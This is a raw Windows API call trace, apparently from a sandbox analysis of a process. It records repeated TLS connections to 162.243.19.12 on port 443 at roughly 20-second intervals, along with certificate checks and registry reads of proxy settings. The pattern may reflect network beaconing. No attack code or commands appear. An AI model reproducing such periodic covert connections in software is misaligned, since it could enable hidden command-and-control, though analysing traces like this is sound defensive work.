	[0247.485] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23b9d9c0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23ba1b58, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23ba1b78, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23ba1b78, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0247.486] recv (in: s=0x7d0, buf=0x2ad23ba1c68, len=5, flags=0 | out: buf=0x2ad23ba1c68*) returned 5
	[0247.486] recv (in: s=0x7d0, buf=0x2ad23ba1c8d, len=48, flags=0 | out: buf=0x2ad23ba1c8d*) returned 48
	[0247.486] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23b9d9c0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23ba1d90, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23ba1db0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23ba1db0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0247.487] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3980 | out: pvContextBuffer=0x2ad3bad3980) returned 0x0
	[0247.487] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23ba1ef8 | out: pBuffer=0x2ad23ba1ef8) returned 0x0
	[0247.487] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23ba1f50 | out: pBuffer=0x2ad23ba1f50) returned 0x0
	[0247.488] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23ba1fb8 | out: pBuffer=0x2ad23ba1fb8) returned 0x0
	[0247.488] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05cd0) returned 0x2ad3bb05cd0
	[0247.489] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0247.489] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb05cd0
	[0247.489] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05cd0) returned 0x2ad3bb05cd0
	[0247.489] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb05cd0) returned 0x0
	[0247.489] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0247.490] CertFreeCertificateContext (pCertContext=0x2ad3bb05cd0) returned 1
	[0247.491] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0247.491] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb05cd0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0247.491] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb05cd0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0247.493] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0247.495] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05cd0) returned 0x2ad3bb05cd0
	[0247.496] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0247.496] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0247.497] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0247.497] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0247.497] SetLastError (dwErrCode=0x0) 
	[0247.497] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0247.497] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0247.498] CertFreeCertificateContext (pCertContext=0x2ad3bb05cd0) returned 1
	[0247.498] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23ba4bc0, MessageSeqNo=0x0 | out: pMessage=0x2ad23ba4bc0) returned 0x0
	[0247.498] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca340
	[0247.499] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca340*=((len=0x3b, buf=0x2ad23ba1e80*), (len=0xd5, buf=0x2ad23ba49c8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca340*=((len=0x3b, buf=0x2ad23ba1e80*), (len=0xd5, buf=0x2ad23ba49c8*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0247.499] CoTaskMemFree (pv=0x2ad3baca340) 
	[0247.499] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0247.499] recv (in: s=0x7d0, buf=0x2ad23ba4d68, len=5, flags=0 | out: buf=0x2ad23ba4d68*) returned 5
	[0247.955] recv (in: s=0x7d0, buf=0x2ad23ba4d8d, len=1488, flags=0 | out: buf=0x2ad23ba4d8d*) returned 1488
	[0247.955] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23ba5470, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23ba5470, pfQOP=0x0) returned 0x0
	[0247.955] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0247.956] SetEvent (hEvent=0x6b8) returned 1
	[0247.988] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0253.992] CloseHandle (hObject=0x388) returned 1
	[0254.181] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0254.181] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x398) returned 0x0
	[0254.181] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4
	[0254.182] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3f4, fAsynchronous=1) returned 0x0
	[0254.184] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9cc) returned 0x0
	[0254.185] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d4
	[0254.185] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d4, fAsynchronous=1) returned 0x0
	[0254.186] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9d8) returned 0x0
	[0254.186] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9dc
	[0254.186] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9dc, fAsynchronous=1) returned 0x0
	[0254.186] GetCurrentProcess () returned 0xffffffffffffffff
	[0254.186] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9e0) returned 1
	[0254.186] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb19ce0
	[0254.187] WinHttpSetTimeouts (hInternet=0x2ad3bb19ce0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0254.187] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0254.207] SetEvent (hEvent=0x6b8) returned 1
	[0254.207] select (in: nfds=0, readfds=0x2ad23bacb88, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23bacb88, writefds=0x0, exceptfds=0x0) returned 1
	[0254.208] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0254.209] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0254.210] shutdown (s=0x7d0, how=2) returned 0
	[0254.222] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0254.222] closesocket (s=0x7d0) returned 0
	[0254.224] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0254.225] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9e8
	[0254.225] WSAConnect (in: s=0x7d0, name=0x2ad23bae320*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0254.334] closesocket (s=0x9e8) returned 0
	[0254.335] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23bab2c8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23baeba8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23baeba8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0254.337] FreeContextBuffer (in: pvContextBuffer=0x2ad3badf500 | out: pvContextBuffer=0x2ad3badf500) returned 0x0
	[0254.337] send (in: s=0x7d0, buf=0x2ad23baec78*, len=333, flags=0 | out: buf=0x2ad23baec78*) returned 333
	[0254.337] recv (in: s=0x7d0, buf=0x2ad23baec78, len=5, flags=0 | out: buf=0x2ad23baec78*) returned 5
	[0254.444] recv (in: s=0x7d0, buf=0x2ad23baec7d, len=49, flags=0 | out: buf=0x2ad23baec7d*) returned 49
	[0254.444] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23bab2c8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23baeeb8, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23baeed8, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23baeed8, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0254.447] recv (in: s=0x7d0, buf=0x2ad23baefc8, len=5, flags=0 | out: buf=0x2ad23baefc8*) returned 5
	[0254.447] recv (in: s=0x7d0, buf=0x2ad23baefed, len=1, flags=0 | out: buf=0x2ad23baefed*) returned 1
	[0254.447] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23bab2c8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23baf0c0, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23baf0e0, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23baf0e0, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0254.448] recv (in: s=0x7d0, buf=0x2ad23baf1d0, len=5, flags=0 | out: buf=0x2ad23baf1d0*) returned 5
	[0254.448] recv (in: s=0x7d0, buf=0x2ad23baf1f5, len=48, flags=0 | out: buf=0x2ad23baf1f5*) returned 48
	[0254.448] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23bab2c8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23baf2f8, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23baf318, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23baf318, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0254.451] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2b40 | out: pvContextBuffer=0x2ad3bad2b40) returned 0x0
	[0254.452] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23baf460 | out: pBuffer=0x2ad23baf460) returned 0x0
	[0254.452] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23baf4b8 | out: pBuffer=0x2ad23baf4b8) returned 0x0
	[0254.453] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23baf520 | out: pBuffer=0x2ad23baf520) returned 0x0
	[0254.453] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05950) returned 0x2ad3bb05950
	[0254.454] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0254.454] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb05950
	[0254.455] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05950) returned 0x2ad3bb05950
	[0254.455] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb05950) returned 0x0
	[0254.455] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0254.455] CertFreeCertificateContext (pCertContext=0x2ad3bb05950) returned 1
	[0254.457] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0254.457] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb05950, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0254.458] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb05950, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0254.460] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0254.463] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05950) returned 0x2ad3bb05950
	[0254.463] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0254.464] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0254.464] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0254.464] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0254.464] SetLastError (dwErrCode=0x0) 
	[0254.464] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0254.466] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0254.466] CertFreeCertificateContext (pCertContext=0x2ad3bb05950) returned 1
	[0254.467] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23bb2128, MessageSeqNo=0x0 | out: pMessage=0x2ad23bb2128) returned 0x0
	[0254.467] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca220
	[0254.467] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca220*=((len=0x3b, buf=0x2ad23baf3e8*), (len=0xd5, buf=0x2ad23bb1f30*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca220*=((len=0x3b, buf=0x2ad23baf3e8*), (len=0xd5, buf=0x2ad23bb1f30*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0254.468] CoTaskMemFree (pv=0x2ad3baca220) 
	[0254.468] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0254.468] recv (in: s=0x7d0, buf=0x2ad23bb22d0, len=5, flags=0 | out: buf=0x2ad23bb22d0*) returned 5
	[0254.932] recv (in: s=0x7d0, buf=0x2ad23bb22f5, len=1488, flags=0 | out: buf=0x2ad23bb22f5*) returned 1488
	[0254.932] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23bb29d8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23bb29d8, pfQOP=0x0) returned 0x0
	[0254.933] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0254.933] SetEvent (hEvent=0x6b8) returned 1
	[0254.988] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0275.993] CloseHandle (hObject=0x388) returned 1
	[0276.275] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0276.275] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x398) returned 0x0
	[0276.276] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4
	[0276.276] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3f4, fAsynchronous=1) returned 0x0
	[0276.277] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9cc) returned 0x0
	[0276.277] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d4
	[0276.277] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d4, fAsynchronous=1) returned 0x0
	[0276.278] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9d8) returned 0x0
	[0276.278] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9dc
	[0276.278] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9dc, fAsynchronous=1) returned 0x0
	[0276.279] GetCurrentProcess () returned 0xffffffffffffffff
	[0276.279] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9e0) returned 1
	[0276.279] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb1b220
	[0276.279] WinHttpSetTimeouts (hInternet=0x2ad3bb1b220, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0276.280] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0276.295] SetEvent (hEvent=0x6b8) returned 1
	[0276.296] select (in: nfds=0, readfds=0x2ad23bba3d0, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23bba3d0, writefds=0x0, exceptfds=0x0) returned 1
	[0276.296] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0276.298] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0276.300] shutdown (s=0x7d0, how=2) returned 0
	[0276.309] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0276.309] closesocket (s=0x7d0) returned 0
	[0276.310] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0276.311] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9e8
	[0276.311] WSAConnect (in: s=0x7d0, name=0x2ad23bbbb68*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0276.420] closesocket (s=0x9e8) returned 0
	[0276.421] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23bb8b10, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23bbc3f0, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23bbc3f0, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0276.422] FreeContextBuffer (in: pvContextBuffer=0x2ad3badf7e0 | out: pvContextBuffer=0x2ad3badf7e0) returned 0x0
	[0276.422] send (in: s=0x7d0, buf=0x2ad23bbc4c0*, len=333, flags=0 | out: buf=0x2ad23bbc4c0*) returned 333
	[0276.423] recv (in: s=0x7d0, buf=0x2ad23bbc4c0, len=5, flags=0 | out: buf=0x2ad23bbc4c0*) returned 5
	[0276.528] recv (in: s=0x7d0, buf=0x2ad23bbc4c5, len=49, flags=0 | out: buf=0x2ad23bbc4c5*) returned 49
	[0276.528] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23bb8b10, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bbc700, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bbc720, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bbc720, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0276.529] recv (in: s=0x7d0, buf=0x2ad23bbc810, len=5, flags=0 | out: buf=0x2ad23bbc810*) returned 5
	[0276.529] recv (in: s=0x7d0, buf=0x2ad23bbc835, len=1, flags=0 | out: buf=0x2ad23bbc835*) returned 1
	[0276.529] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23bb8b10, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bbc908, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bbc928, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bbc928, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0276.530] recv (in: s=0x7d0, buf=0x2ad23bbca18, len=5, flags=0 | out: buf=0x2ad23bbca18*) returned 5
	[0276.530] recv (in: s=0x7d0, buf=0x2ad23bbca3d, len=48, flags=0 | out: buf=0x2ad23bbca3d*) returned 48
	[0276.530] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23bb8b10, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bbcb40, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23bbcb60, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23bbcb60, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0276.532] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2960 | out: pvContextBuffer=0x2ad3bad2960) returned 0x0
	[0276.532] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23bbcca8 | out: pBuffer=0x2ad23bbcca8) returned 0x0
	[0276.532] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23bbcd00 | out: pBuffer=0x2ad23bbcd00) returned 0x0
	[0276.533] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23bbcd68 | out: pBuffer=0x2ad23bbcd68) returned 0x0
	[0276.533] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04fd0) returned 0x2ad3bb04fd0
	[0276.534] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0276.534] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb04fd0
	[0276.534] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04fd0) returned 0x2ad3bb04fd0
	[0276.534] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb04fd0) returned 0x0
	[0276.534] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0276.535] CertFreeCertificateContext (pCertContext=0x2ad3bb04fd0) returned 1
	[0276.536] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0276.536] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb04fd0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0276.536] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb04fd0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0276.538] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0276.540] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04fd0) returned 0x2ad3bb04fd0
	[0276.541] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0276.542] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0276.542] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0276.542] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0276.542] SetLastError (dwErrCode=0x0) 
	[0276.542] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0276.543] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0276.543] CertFreeCertificateContext (pCertContext=0x2ad3bb04fd0) returned 1
